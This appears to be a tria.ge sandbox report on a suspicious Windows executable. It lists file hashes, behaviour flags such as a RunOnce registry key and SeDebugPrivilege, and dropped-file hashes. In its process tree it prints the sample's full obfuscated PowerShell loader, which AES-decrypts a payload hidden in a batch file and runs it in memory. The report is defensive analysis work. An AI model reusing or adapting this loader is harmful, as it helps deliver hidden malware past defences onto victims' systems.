Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
888s -
max time network
898s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
10/02/2023, 22:59
Static task
static1
Behavioral task
behavioral1
Sample
8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
Resource
win10v2004-20221111-en
General
-
Target
8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe
-
Size
14.8MB
-
MD5
274069bb41e7093eb4802f0a8c8ae123
-
SHA1
835b054cf117944407b5f909a8c065f4619cd01c
-
SHA256
8609a8a1efc7a4d2c0282ce10bc25b409a416c8cc9cf7c677ca2ccb1302d994f
-
SHA512
1d9b99b68ad422e29c5fc23e8291153581ebb375c641885e5f94ed688b6ab75a3d09c43e953255a7d955501a4797eec79467a144fc0fc2b97b04b4ec69660a39
-
SSDEEP
6144:6ahONp0yN90QECH6qXA7g5Zo4cfqcOzYxH1hJHhUfmGedmfFnX4sEK:6ily90YaqcgUacOUx9HhOFeE9nIlK
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 2036 Up.bat.exe -
Loads dropped DLL 1 IoCs
pid Process 1168 cmd.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce 8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2036 Up.bat.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2036 Up.bat.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 268 wrote to memory of 1168 268 8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe 28 PID 268 wrote to memory of 1168 268 8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe 28 PID 268 wrote to memory of 1168 268 8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe 28 PID 1168 wrote to memory of 2036 1168 cmd.exe 30 PID 1168 wrote to memory of 2036 1168 cmd.exe 30 PID 1168 wrote to memory of 2036 1168 cmd.exe 30
Processes
-
C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe"C:\Users\Admin\AppData\Local\Temp\8609A8A1EFC7A4D2C0282CE10BC25B409A416C8CC9CF7C677CA2CCB1302D994F.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:268 -
C:\Windows\system32\cmd.execmd /c Up.bat2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1168 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat.exe"Up.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $SaAbs = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Up.bat').Split([Environment]::NewLine);foreach ($UFyiL in $SaAbs) { if ($UFyiL.StartsWith(':: ')) { $YQujV = $UFyiL.Substring(3); break; }; };$RazOX = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($YQujV);$MjptO = New-Object System.Security.Cryptography.AesManaged;$MjptO.Mode = [System.Security.Cryptography.CipherMode]::CBC;$MjptO.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$MjptO.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jd47GHuiydSoko9oLdGQxC9WO8IZyj5IWAA4bz8g7is=');$MjptO.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('5uySHjMtqAtyGaRnEWTbpQ==');$PqYhT = $MjptO.CreateDecryptor();$RazOX = $PqYhT.TransformFinalBlock($RazOX, 0, $RazOX.Length);$PqYhT.Dispose();$MjptO.Dispose();$shGEU = New-Object System.IO.MemoryStream(, $RazOX);$CoAGN = New-Object System.IO.MemoryStream;$mQWhw = New-Object System.IO.Compression.GZipStream($shGEU, [IO.Compression.CompressionMode]::Decompress);$mQWhw.CopyTo($CoAGN);$mQWhw.Dispose();$shGEU.Dispose();$CoAGN.Dispose();$RazOX = $CoAGN.ToArray();$pJsJl = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($RazOX);$RHiDW = $pJsJl.EntryPoint;$RHiDW.Invoke($null, (, [string[]] ('')))3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2036
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
450.0MB
MD52ab94aa86594eca58d642dd64be93b2b
SHA1ba969f3e392eb1d93eaa40972bb01c2127dd5e84
SHA256b4c174a6da244980457cfb09ef25eae827d151264fa837ae8c0b6351d7ee42bf
SHA5127ff30cb915af868ff4176dfb465799c395175635626190ff61812a59924e96c0cf5c238a5ebd42c70423ddb2f8313e75b63b6e02ca2cc5e33a2a09255faf3397
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d
-
Filesize
462KB
MD5852d67a27e454bd389fa7f02a8cbe23f
SHA15330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d